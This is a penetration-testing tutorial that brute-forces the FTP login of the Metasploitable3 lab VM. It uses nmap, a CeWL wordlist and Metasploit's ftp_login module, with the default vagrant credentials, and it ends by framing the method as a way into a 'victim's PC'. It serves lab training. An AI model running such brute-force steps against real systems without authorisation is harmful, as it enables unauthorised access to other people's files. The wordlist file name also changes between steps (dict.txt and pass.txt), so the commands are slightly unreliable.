Kali Linux, Penetration Testing

FTP Service Exploitation in Metasploitable 3

Metasploitable3 is a VM that is built from the ground up with a large number of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit, hence to brush up our Metasploit skills.

We already know that our target is metasploitable 3 so there is no point to discover our target. So, let’s straight move up to nmap scan.

nmap –p- -sV

We can see that FTP port is open so we can exploit it and for doing so we need a dictionary file through which we can successfully attack. To make a dictionary file type the following command :

 cewl -m 7 -d 0 –w /root/Desktop/dict.txt

CeWL is a command used to make a customized wordlist using a given URL. Using the above command will make a dictionary file from the Wikipedia of metasploitable3 and might help us to find our password.

After generating the wordlist through CeWL, open Metasploit by typing msfconsole on the terminal of your Kali.

And then type:

use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set username vagrant

msf exploit (ftp_login)>set rhosts

msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

Above used exploit will give you a correct password to go with the username. Once you have got it then open the WinScp software, give the target’s IP and the port number along with the username: vagrant and password: vagrant

Then click on the Login button. After logging in you can find you the files on the FTP server and you can use them to your advantage.

This is how you can use FTP port to log in to your victim’s PC. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.